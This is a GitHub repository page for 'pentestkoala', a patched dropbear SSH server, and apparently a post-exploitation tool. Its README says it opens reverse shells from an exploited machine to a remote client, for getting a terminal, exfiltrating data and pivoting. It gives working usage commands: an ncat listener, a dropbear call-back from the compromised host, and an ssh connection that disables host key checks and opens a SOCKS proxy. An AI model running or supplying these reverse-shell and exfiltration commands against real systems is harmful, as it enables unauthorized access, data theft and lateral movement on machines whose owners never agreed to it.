GitHub - mrschyte/pentestkoala: Modified dropbear server which acts as a client and allows authless login

mrschyte / pentestkoala Public

Notifications You must be signed in to change notification settings
Fork 27
Star 126

Modified dropbear server which acts as a client and allows authless login

126 stars 27 forks Branches Tags Activity

Notifications

Name		Name	Last commit message	Last commit date
Latest commit History 20 Commits
debian		debian
libtomcrypt		libtomcrypt
libtommath		libtommath
.hg_archival.txt		.hg_archival.txt
.hgsigs		.hgsigs
.travis.yml		.travis.yml
CHANGES		CHANGES
INSTALL		INSTALL
LICENSE		LICENSE
MULTI		MULTI
Makefile.in		Makefile.in
README		README
SMALL		SMALL
TODO		TODO
agentfwd.h		agentfwd.h
algo.h		algo.h
atomicio.c		atomicio.c
atomicio.h		atomicio.h
auth.h		auth.h
bignum.c		bignum.c
bignum.h		bignum.h
buffer.c		buffer.c
buffer.h		buffer.h
channel.h		channel.h
chansession.h		chansession.h
circbuffer.c		circbuffer.c
circbuffer.h		circbuffer.h
cli-agentfwd.c		cli-agentfwd.c
cli-auth.c		cli-auth.c
cli-authinteract.c		cli-authinteract.c
cli-authpasswd.c		cli-authpasswd.c
cli-authpubkey.c		cli-authpubkey.c
cli-channel.c		cli-channel.c
cli-chansession.c		cli-chansession.c
cli-kex.c		cli-kex.c
cli-main.c		cli-main.c
cli-runopts.c		cli-runopts.c
cli-session.c		cli-session.c
cli-tcpfwd.c		cli-tcpfwd.c
common-algo.c		common-algo.c
common-channel.c		common-channel.c
common-chansession.c		common-chansession.c
common-kex.c		common-kex.c
common-runopts.c		common-runopts.c
common-session.c		common-session.c
compat.c		compat.c
compat.h		compat.h
config.guess		config.guess
config.h.in		config.h.in
config.sub		config.sub
configure		configure
configure.ac		configure.ac
crypto_desc.c		crypto_desc.c
crypto_desc.h		crypto_desc.h
curve25519-donna.c		curve25519-donna.c
dbclient.1		dbclient.1
dbhelpers.c		dbhelpers.c
dbhelpers.h		dbhelpers.h
dbmulti.c		dbmulti.c
dbrandom.c		dbrandom.c
dbrandom.h		dbrandom.h
dbutil.c		dbutil.c
dbutil.h		dbutil.h
debug.h		debug.h
dh_groups.c		dh_groups.c
dh_groups.h		dh_groups.h
dropbear.8		dropbear.8
dropbearconvert.1		dropbearconvert.1
dropbearconvert.c		dropbearconvert.c
dropbearkey.1		dropbearkey.1
dropbearkey.c		dropbearkey.c
dss.c		dss.c
dss.h		dss.h
ecc.c		ecc.c
ecc.h		ecc.h
ecdsa.c		ecdsa.c
ecdsa.h		ecdsa.h
fake-rfc2553.c		fake-rfc2553.c
fake-rfc2553.h		fake-rfc2553.h
filelist.txt		filelist.txt
gendss.c		gendss.c
gendss.h		gendss.h
genrsa.c		genrsa.c
genrsa.h		genrsa.h
gensignkey.c		gensignkey.c
gensignkey.h		gensignkey.h
includes.h		includes.h
install-sh		install-sh
kex.h		kex.h
keyimport.c		keyimport.c
keyimport.h		keyimport.h
list.c		list.c
list.h		list.h
listener.c		listener.c
listener.h		listener.h
ltc_prng.c		ltc_prng.c
ltc_prng.h		ltc_prng.h
netio.c		netio.c
netio.h		netio.h
options.h		options.h

Repository files navigation

Koala is a patched version of the dropbear SSH server that instead of
binding to a port opens up reverse shells by connecting to a remote
client.

This is useful for gaining a pty terminal on an exploited machine and
also for secure exfiltration of data via SSH port forwarding. Pivoting
can also be done by using the dynamic SSH port forwarding feature.


[Usage]

Run the following command on the client to listen for the SSH connection:
$ ncat -lvp 5000 --sh-exec 'ncat -lvp 9999'

On the exploited host run:
$ ./dropbear -p client-host:5000

Now on the client, connect to port 9999 to open up a shell:
$ ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null localhost -D9050 -p9999